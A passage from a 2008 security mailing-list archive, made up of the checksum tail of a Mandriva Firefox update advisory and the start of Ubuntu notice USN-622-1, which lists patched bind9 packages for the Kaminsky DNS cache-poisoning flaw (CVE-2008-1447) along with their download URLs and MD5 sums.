corporate/3.0/x86_64/mozilla-firefox-ru-2.0.0.15-0.1.C30mdk.x86_64.rpm 7e83850ad88e4c7779771a1c21d2ad8b corporate/3.0/x86_64/mozilla-firefox-sk-2.0.0.15-0.1.C30mdk.x86_64.rpm 87476a3af4a727b492f8dc7001eafe70 corporate/3.0/x86_64/mozilla-firefox-sl-2.0.0.15-0.1.C30mdk.x86_64.rpm 97a61c0bd425f4b66e08c7fb25828f48 corporate/3.0/x86_64/mozilla-firefox-sv-2.0.0.15-0.1.C30mdk.x86_64.rpm 9e052b952b30fa3ff85b9e2670b1aaeb corporate/3.0/x86_64/mozilla-firefox-tr-2.0.0.15-0.1.C30mdk.x86_64.rpm bb31e222380bb0ea5bfd2a608f212016 corporate/3.0/x86_64/mozilla-firefox-uk-2.0.0.15-0.1.C30mdk.x86_64.rpm 0b6bd8067d51d6ee9131f66c998e1a80 corporate/3.0/x86_64/mozilla-firefox-zh_CN-2.0.0.15-0.1.C30mdk.x86_64.rpm b2ce94ea1939419303171e534229866b corporate/3.0/x86_64/mozilla-firefox-zh_TW-2.0.0.15-0.1.C30mdk.x86_64.rpm ee1e837a087dbd3df1767c85301c4655 corporate/3.0/SRPMS/mozilla-firefox-2.0.0.15-0.1.C30mdk.src.rpm ee2a600a518aaae667977510c8b2b1d3 corporate/3.0/SRPMS/mozilla-firefox-l10n-2.0.0.15-0.1.C30mdk.src.rpm Corporate 4.0: 18534104f1f64b96d2782e0e4cac565c corporate/4.0/i586/libnspr4-2.0.0.15-0.1.20060mlcs4.i586.rpm 46c351e1712ac99e258db977ad281c45 corporate/4.0/i586/libnspr4-devel-2.0.0.15-0.1.20060mlcs4.i586.rpm 3b6f70ceac6ad471931c9a55c6283134 corporate/4.0/i586/libnspr4-static-devel-2.0.0.15-0.1.20060mlcs4.i586.rpm cd363e2fd6d442b5997368689c9c48e5 corporate/4.0/i586/libnss3-2.0.0.15-0.1.20060mlcs4.i586.rpm cb387a98ce8a80205fc0678b055822a7 corporate/4.0/i586/libnss3-devel-2.0.0.15-0.1.20060mlcs4.i586.rpm 9f200cfc309ad92f649d9794089bb5fe corporate/4.0/i586/mozilla-firefox-2.0.0.15-0.1.20060mlcs4.i586.rpm 5984c979a65d91ff97cd1f0d1a4acb88 corporate/4.0/i586/mozilla-firefox-af-2.0.0.15-0.1.20060mlcs4.i586.rpm 6b3cf48e86de8b56acac63649a042153 corporate/4.0/i586/mozilla-firefox-ar-2.0.0.15-0.1.20060mlcs4.i586.rpm 42f66564cdb78240deaefc71e99b3f37 corporate/4.0/i586/mozilla-firefox-be-2.0.0.15-0.1.20060mlcs4.i586.rpm 47a26b0154b4a2fdad1890814bda9c64 corporate/4.0/i586/mozilla-firefox-bg-2.0.0.15-0.1.20060mlcs4.i586.rpm 1812331e1652f4760c022e56e4d827c0 corporate/4.0/i586/mozilla-firefox-br_FR-2.0.0.15-0.1.20060mlcs4.i586.rpm c6374bd6725d8140bdba03771d03f627 corporate/4.0/i586/mozilla-firefox-ca-2.0.0.15-0.1.20060mlcs4.i586.rpm dfd0d26fe1ea949912a7a2f1de90f097 corporate/4.0/i586/mozilla-firefox-cs-2.0.0.15-0.1.20060mlcs4.i586.rpm 4f26c1dd72d2408f7e41f524d32d60a2 corporate/4.0/i586/mozilla-firefox-da-2.0.0.15-0.1.20060mlcs4.i586.rpm 2d2ebd81dccb4c9adf3bda148c1cf91f corporate/4.0/i586/mozilla-firefox-de-2.0.0.15-0.1.20060mlcs4.i586.rpm 75c13600dc8a1ad6d36149122ac60a80 corporate/4.0/i586/mozilla-firefox-devel-2.0.0.15-0.1.20060mlcs4.i586.rpm 11b812e85965e3a2e3fa7b86671ddfe4 corporate/4.0/i586/mozilla-firefox-el-2.0.0.15-0.1.20060mlcs4.i586.rpm 6d2ffcf4faba69088e20ee0f800ad8c8 corporate/4.0/i586/mozilla-firefox-en_GB-2.0.0.15-0.1.20060mlcs4.i586.rpm 838ee52826fc23e824378e9e0a25dc83 corporate/4.0/i586/mozilla-firefox-es_AR-2.0.0.15-0.1.20060mlcs4.i586.rpm ebb5ffcf2977e544694e9d50aa68aefa corporate/4.0/i586/mozilla-firefox-es_ES-2.0.0.15-0.1.20060mlcs4.i586.rpm 7b2db313feb5ec2a7df29f4c18e6b8e5 corporate/4.0/i586/mozilla-firefox-et_EE-2.0.0.15-0.1.20060mlcs4.i586.rpm 04093eeca5aee4e35a4b36e2898e2273 corporate/4.0/i586/mozilla-firefox-eu-2.0.0.15-0.1.20060mlcs4.i586.rpm b6d735a073e79578a31febe807da46dd corporate/4.0/i586/mozilla-firefox-fi-2.0.0.15-0.1.20060mlcs4.i586.rpm 1d20aa142a9899b57490dc69719b053c corporate/4.0/i586/mozilla-firefox-fr-2.0.0.15-0.1.20060mlcs4.i586.rpm ebbb0720f1b93a20a624ffb86161d72c corporate/4.0/i586/mozilla-firefox-fy-2.0.0.15-0.1.20060mlcs4.i586.rpm ff0a969c2c8a815eebfaa79a89b0f37f corporate/4.0/i586/mozilla-firefox-ga-2.0.0.15-0.1.20060mlcs4.i586.rpm 9cdba4cfdf8516729fee107bc27d81b4 corporate/4.0/i586/mozilla-firefox-gu_IN-2.0.0.15-0.1.20060mlcs4.i586.rpm 2c7e9f416710ba557776fe6ea8bc228d corporate/4.0/i586/mozilla-firefox-he-2.0.0.15-0.1.20060mlcs4.i586.rpm 2ee965dbe647e1d83a48749993d44378 corporate/4.0/i586/mozilla-firefox-hu-2.0.0.15-0.1.20060mlcs4.i586.rpm ac83321c22a1b65c10e6f2776d23ec25 corporate/4.0/i586/mozilla-firefox-it-2.0.0.15-0.1.20060mlcs4.i586.rpm 63de7009a88f69de78e016afca9a7e2c corporate/4.0/i586/mozilla-firefox-ja-2.0.0.15-0.1.20060mlcs4.i586.rpm 6830c7c4c8c243de10cb73c8cadabaca corporate/4.0/i586/mozilla-firefox-ka-2.0.0.15-0.1.20060mlcs4.i586.rpm a75996a353819eeeaf6ca010d6df3f38 corporate/4.0/i586/mozilla-firefox-ko-2.0.0.15-0.1.20060mlcs4.i586.rpm 028932e0e9abbe54554319b9814f25df corporate/4.0/i586/mozilla-firefox-ku-2.0.0.15-0.1.20060mlcs4.i586.rpm 66e5dcd3cba68142f561500aec7abeea corporate/4.0/i586/mozilla-firefox-lt-2.0.0.15-0.1.20060mlcs4.i586.rpm 8c0df9bc1c4c4a75cd2cfdccb4a0624f corporate/4.0/i586/mozilla-firefox-mk-2.0.0.15-0.1.20060mlcs4.i586.rpm ab5f6b47fc2abeebbaf705d6f058cd69 corporate/4.0/i586/mozilla-firefox-mn-2.0.0.15-0.1.20060mlcs4.i586.rpm 5f2069f9bbea293ec165dd9d5e0a7f44 corporate/4.0/i586/mozilla-firefox-nb_NO-2.0.0.15-0.1.20060mlcs4.i586.rpm 8ded5e19197ce7d8ec504426f90ee3b7 corporate/4.0/i586/mozilla-firefox-nl-2.0.0.15-0.1.20060mlcs4.i586.rpm 50486a807a8bd1a2f5dea3203067f23a corporate/4.0/i586/mozilla-firefox-nn_NO-2.0.0.15-0.1.20060mlcs4.i586.rpm f2757c38555e780b908bbd8c77a36073 corporate/4.0/i586/mozilla-firefox-pa_IN-2.0.0.15-0.1.20060mlcs4.i586.rpm 046f6aa3b6fb63faf1558e8d8d58aa32 corporate/4.0/i586/mozilla-firefox-pl-2.0.0.15-0.1.20060mlcs4.i586.rpm 5fca45cede7824b28b62e4a9a010fd50 corporate/4.0/i586/mozilla-firefox-pt_BR-2.0.0.15-0.1.20060mlcs4.i586.rpm 0e22245a453595d733052f7a90e63ef7 corporate/4.0/i586/mozilla-firefox-pt_PT-2.0.0.15-0.1.20060mlcs4.i586.rpm 268043455d5cebfbf5fa67008f591acc corporate/4.0/i586/mozilla-firefox-ro-2.0.0.15-0.1.20060mlcs4.i586.rpm a2ca5a85d74e8b999fee223add2f5d16 corporate/4.0/i586/mozilla-firefox-ru-2.0.0.15-0.1.20060mlcs4.i586.rpm 201529937b5cf7f9c8ea424de2c79391 corporate/4.0/i586/mozilla-firefox-sk-2.0.0.15-0.1.20060mlcs4.i586.rpm c399f95dc220eaadf50a7c53ec651c76 corporate/4.0/i586/mozilla-firefox-sl-2.0.0.15-0.1.20060mlcs4.i586.rpm f5707251284e8b4454b629771cb3d2c9 corporate/4.0/i586/mozilla-firefox-sv_SE-2.0.0.15-0.1.20060mlcs4.i586.rpm 0ee2cb552e00afae72458937edfa041c corporate/4.0/i586/mozilla-firefox-tr-2.0.0.15-0.1.20060mlcs4.i586.rpm f9cb86b6f70f58e0d0a0ebb5ff96db3f corporate/4.0/i586/mozilla-firefox-uk-2.0.0.15-0.1.20060mlcs4.i586.rpm 2c140eeb007b8614b4cbde2fd8ed6141 corporate/4.0/i586/mozilla-firefox-zh_CN-2.0.0.15-0.1.20060mlcs4.i586.rpm 6a1a8f432a3d1972cd190f508af15377 corporate/4.0/i586/mozilla-firefox-zh_TW-2.0.0.15-0.1.20060mlcs4.i586.rpm fe657ce78ff333a5655dfcf1e02a5a50 corporate/4.0/SRPMS/mozilla-firefox-2.0.0.15-0.1.20060mlcs4.src.rpm dfa0025da70bdfd1ef8a09b737c35ed2 corporate/4.0/SRPMS/mozilla-firefox-l10n-2.0.0.15-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: f2a800f1edd9eff1d14aedd14c7b2f48 corporate/4.0/x86_64/lib64nspr4-2.0.0.15-0.1.20060mlcs4.x86_64.rpm f325c557fa1a9358c99bbc51050ebcc2 corporate/4.0/x86_64/lib64nspr4-devel-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 1ee670e73efd3522f1ddede073701d00 corporate/4.0/x86_64/lib64nspr4-static-devel-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 6078792c31b9700fec63c600f7280292 corporate/4.0/x86_64/lib64nss3-2.0.0.15-0.1.20060mlcs4.x86_64.rpm c1953747b5cef1ffada570227fc67b02 corporate/4.0/x86_64/lib64nss3-devel-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 30f48afd68aa21b17f7bf48526672e50 corporate/4.0/x86_64/mozilla-firefox-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 13fe40c82f5ce2dc9cd34724e1defed6 corporate/4.0/x86_64/mozilla-firefox-af-2.0.0.15-0.1.20060mlcs4.x86_64.rpm e20aeeb23f3594cd8c244cae0bf75351 corporate/4.0/x86_64/mozilla-firefox-ar-2.0.0.15-0.1.20060mlcs4.x86_64.rpm e4ae2305795418434f6df0bb39dbcb2e corporate/4.0/x86_64/mozilla-firefox-be-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 5ea0ef9db5ee705ea810953dcdfe0a44 corporate/4.0/x86_64/mozilla-firefox-bg-2.0.0.15-0.1.20060mlcs4.x86_64.rpm fe3c7a48d2c482c46a2b6e3d3bbea6b5 corporate/4.0/x86_64/mozilla-firefox-br_FR-2.0.0.15-0.1.20060mlcs4.x86_64.rpm ecaa7d198d381fad6c18247b074ccd90 corporate/4.0/x86_64/mozilla-firefox-ca-2.0.0.15-0.1.20060mlcs4.x86_64.rpm b4e73b247ce84b6e805fef3efa8ad94a corporate/4.0/x86_64/mozilla-firefox-cs-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 50f275f1bfa7457d548a0e68c748515e corporate/4.0/x86_64/mozilla-firefox-da-2.0.0.15-0.1.20060mlcs4.x86_64.rpm d08b03cd1db96d3c2675639960a834c0 corporate/4.0/x86_64/mozilla-firefox-de-2.0.0.15-0.1.20060mlcs4.x86_64.rpm eba4c92c1bab4b77aa55d933bf5db98f corporate/4.0/x86_64/mozilla-firefox-devel-2.0.0.15-0.1.20060mlcs4.x86_64.rpm a293dce82bb3ba0e0b0bed9cc89888b2 corporate/4.0/x86_64/mozilla-firefox-el-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 3a52656f80ec2ddc1f985424bfb5693e corporate/4.0/x86_64/mozilla-firefox-en_GB-2.0.0.15-0.1.20060mlcs4.x86_64.rpm dc4078e8a285d85eab0870805ad63c42 corporate/4.0/x86_64/mozilla-firefox-es_AR-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 7dbff66cf98029bcaec9b1ffd943b99e corporate/4.0/x86_64/mozilla-firefox-es_ES-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 15c4670eb0186d0487005a66aaeac30a corporate/4.0/x86_64/mozilla-firefox-et_EE-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 3fa2de8d24ca1e456ce298e8d9eea773 corporate/4.0/x86_64/mozilla-firefox-eu-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 5d935d7f3f9fc0646feb2f52580880da corporate/4.0/x86_64/mozilla-firefox-fi-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 3af7e38a2998828654cbf6494336c72e corporate/4.0/x86_64/mozilla-firefox-fr-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 6a8061275dc9f7747cdecb08e86059e5 corporate/4.0/x86_64/mozilla-firefox-fy-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 9363ad3ad5027f7ff49116e6ed6e445e corporate/4.0/x86_64/mozilla-firefox-ga-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 642c1467f859647f4e7533c980701688 corporate/4.0/x86_64/mozilla-firefox-gu_IN-2.0.0.15-0.1.20060mlcs4.x86_64.rpm ba5d5c0fa1fa06d8cb54033a90e75b32 corporate/4.0/x86_64/mozilla-firefox-he-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 46258f31c8e6f47b9fbe6f5107738912 corporate/4.0/x86_64/mozilla-firefox-hu-2.0.0.15-0.1.20060mlcs4.x86_64.rpm caf8ec070918ae809bcf6bdf5abd045e corporate/4.0/x86_64/mozilla-firefox-it-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 275f0d724bb465cdbcf6b82c644d728b corporate/4.0/x86_64/mozilla-firefox-ja-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 635b9572411578c932f9eb7f489a1c62 corporate/4.0/x86_64/mozilla-firefox-ka-2.0.0.15-0.1.20060mlcs4.x86_64.rpm df97ba1d0b9da3c9d54fc88776ca615f corporate/4.0/x86_64/mozilla-firefox-ko-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 0e67bf931bdb36bc5e12845d648d183b corporate/4.0/x86_64/mozilla-firefox-ku-2.0.0.15-0.1.20060mlcs4.x86_64.rpm d4ec93ec755cabb47b63f7e942cf2100 corporate/4.0/x86_64/mozilla-firefox-lt-2.0.0.15-0.1.20060mlcs4.x86_64.rpm ecda7282a4b6f16bf9d14704caebfb1a corporate/4.0/x86_64/mozilla-firefox-mk-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 45696ae32d373fcb51c86e91ebc52ca3 corporate/4.0/x86_64/mozilla-firefox-mn-2.0.0.15-0.1.20060mlcs4.x86_64.rpm b2efce8991a5988271c67aabc492ecd8 corporate/4.0/x86_64/mozilla-firefox-nb_NO-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 52bf8d3e513ad4c73006a81d0f01b895 corporate/4.0/x86_64/mozilla-firefox-nl-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 341c82b9b133ea56c1437cfac011b8b4 corporate/4.0/x86_64/mozilla-firefox-nn_NO-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 9388b357b489b49cee5ef2fc4d732079 corporate/4.0/x86_64/mozilla-firefox-pa_IN-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 6b1dc317500787d8ea0c67a225a4055e corporate/4.0/x86_64/mozilla-firefox-pl-2.0.0.15-0.1.20060mlcs4.x86_64.rpm e9ff675bd52c9ea206d4ead64e40786f corporate/4.0/x86_64/mozilla-firefox-pt_BR-2.0.0.15-0.1.20060mlcs4.x86_64.rpm b488904094e9e054d5ac9053e32adc3d corporate/4.0/x86_64/mozilla-firefox-pt_PT-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 58a08c3bd685b1f89e922b9e5095c714 corporate/4.0/x86_64/mozilla-firefox-ro-2.0.0.15-0.1.20060mlcs4.x86_64.rpm c1362a2f7ca22780708bf15222283de9 corporate/4.0/x86_64/mozilla-firefox-ru-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 4261c86ec64a348aa4723f3079a92419 corporate/4.0/x86_64/mozilla-firefox-sk-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 9458552644cbb19a1143482cfb1ff088 corporate/4.0/x86_64/mozilla-firefox-sl-2.0.0.15-0.1.20060mlcs4.x86_64.rpm c762c023004a7751b2e97025c83b596e corporate/4.0/x86_64/mozilla-firefox-sv_SE-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 54c160b5a7bb894c40be80c31093ddaf corporate/4.0/x86_64/mozilla-firefox-tr-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 0893dff4838001321e714536499415a5 corporate/4.0/x86_64/mozilla-firefox-uk-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 586ebcadfe1bb1ec770f28c32767d26f corporate/4.0/x86_64/mozilla-firefox-zh_CN-2.0.0.15-0.1.20060mlcs4.x86_64.rpm 2685525f96ae7468d2b839d66212efc3 corporate/4.0/x86_64/mozilla-firefox-zh_TW-2.0.0.15-0.1.20060mlcs4.x86_64.rpm fe657ce78ff333a5655dfcf1e02a5a50 corporate/4.0/SRPMS/mozilla-firefox-2.0.0.15-0.1.20060mlcs4.src.rpm dfa0025da70bdfd1ef8a09b737c35ed2 corporate/4.0/SRPMS/mozilla-firefox-l10n-2.0.0.15-0.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIc7BBmqjQ0CJFipgRAnEdAKDFKQBMgXiQJat6WJmbwZnntrTYDwCdFDKK 47yaGgNP0pfndZrak/3gm7U= =LxFj -----END PGP SIGNATURE----- From kees at ubuntu.com Tue Jul 8 22:19:56 2008 From: kees at ubuntu.com (Kees Cook) Date: Tue, 8 Jul 2008 14:19:56 -0700 Subject: [Full-disclosure] [USN-622-1] Bind vulnerability Message-ID: <20080708211955.GW5794@outflux.net> =========================================================== Ubuntu Security Notice USN-622-1 July 08, 2008 bind9 vulnerability CVE-2008-1447 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libdns21 1:9.3.2-2ubuntu1.5 Ubuntu 7.04: libdns22 1:9.3.4-2ubuntu2.3 Ubuntu 7.10: libdns32 1:9.4.1-P1-3ubuntu2 Ubuntu 8.04 LTS: libdns35 1:9.4.2-10ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Dan Kaminsky discovered weaknesses in the DNS protocol as implemented by Bind. A remote attacker could exploit this to spoof DNS entries and poison DNS caches. Among other things, this could lead to misdirected email and web traffic. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5.diff.gz Size/MD5: 104296 a0aed8a7f9c1a914d9047876547c67d4 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5.dsc Size/MD5: 803 795915bcbaf3e0c97f5ca1b541fecbe1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2.orig.tar.gz Size/MD5: 5302112 55e709501a7780233c36e25ccd15ece2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.2-2ubuntu1.5_all.deb Size/MD5: 180736 0ca869db29381743a0aa2acd480c0d36 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 112040 52e0eb5609ddf50411d43f388a04f917 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 311534 80e47bf514a33cad401524d7f43e044b http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 184862 d09db412eb19271ecb2cf742a1816b05 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 1130056 50d2a84568a66d6ddf47e95b411fad29 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 92116 c71b74708301acf6a6ecbf608fab5d56 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 557278 63dc3e1e6488e6cff0059d1f3e490682 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 190576 c611f958e1393704d0ba84ed707839b1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 93250 f2005aeb8667d262326bf59d82c69ba1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 109046 4ecb1dbb245b01bddac47ea50e84acfd http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 111524 a75c2314434af46dd79be91ba0dba036 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_amd64.deb Size/MD5: 219944 74b47bf188a3e82200ae564162d61a73 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 108882 b5967775be7b3115c62a4d7f9508b525 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 289854 1873ac12a760a4e14e5b88399658f905 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 175542 ea79ad2e1f210a7e107c90f5770bc806 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 997094 bb0cb2822c28a8e455bf1a928c6d0ef7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 91336 7bd20507d22e86691fb648d12795fc95 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 482908 d20a97bb56024597c1d158ec69b41c14 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 172564 108d61d18f73a8c51913fb1c84260af9 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 90784 3850d2c7f69c31c2d1d013fb862b587d http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 102422 6951c7cdfd7a801b249e33648213d6a4 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 107234 3d8606e265875294b7e150884be8cee7 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_i386.deb Size/MD5: 203328 eb566ef1e4b485523f33271a001b56f9 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 110524 1efa8d84b535e465623561c1f678a89c http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 303594 9066c6e199c0598b7acd70b561506148 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 181654 c4b4fd9157adf5e449d5df01aef1e7d0 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 1204474 5d029c34854c4fca6b704fce98a74851 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 93418 bb908cbdb8c8028ad2af232f354a0008 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 516882 f8437dfca292d7d1d8b93c6aba2ae73a http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 182374 368127ca61e8e8e5bceb49870cd2bd70 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 93604 4e42b14ee385a7c44ee8c1f728cabff7 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 106410 f2db82079a9d85e5acb19e39eb2ced31 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 111058 06126f085691f8a2c8358e47f0a2d8d7 http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_powerpc.deb Size/MD5: 207816 45a904a0518de2feccc9678f83e4d5ec sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 110620 d5fdd4a4e6e4ea89c4e518f66acecbd1 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 301372 e67bc7a6970f534ee5faac384801c895 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 180950 61dfdf0427c07fe2ab35901a64508b5a http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 1116008 8be769301060285de28ad3e568dfd647 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 91674 629c0a0296adcdd7f52547eace987c39 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns21_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 511130 8c5a1778a9efd974dded9ca0f8225bdd http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc11_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 181286 40c07c235b00a44aac6bbc28795c2c07 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 91184 8a2e4f0670f934d831c8cd1b40a3fa7a http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg1_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 103900 80107ec78e4a006784b3a117c05ee1e6 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 106762 8951b01a7b2f97aad4a93210d50850da http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_sparc.deb Size/MD5: 211124 2978354d73f6a9bf7dcd3c96b919eec0 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3.diff.gz Size/MD5: 285716 085d15195d25e9ad690d374e9adaecb0 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3.dsc Size/MD5: 888 9bde4140f2f312c3b4071990f21f5075 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4.orig.tar.gz Size/MD5: 4043577 198181d47c58a0a9c0265862cd5557b0 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.3.4-2ubuntu2.3_all.deb Size/MD5: 187788 25ad7fff219ac84a553e40a6c7af840c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 118810 baf5548fa89037279840b4158cf9c4eb http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 322984 08a1b75f9a77c618f2e36b0534e1a7be http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 194018 bf92cede850d5f189c8895fdce8141f8 http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.3.4-2ubuntu2.3_amd64.deb Size/MD5: 1123068 35f889b48402c1bb56c58d2b0f61dbbf 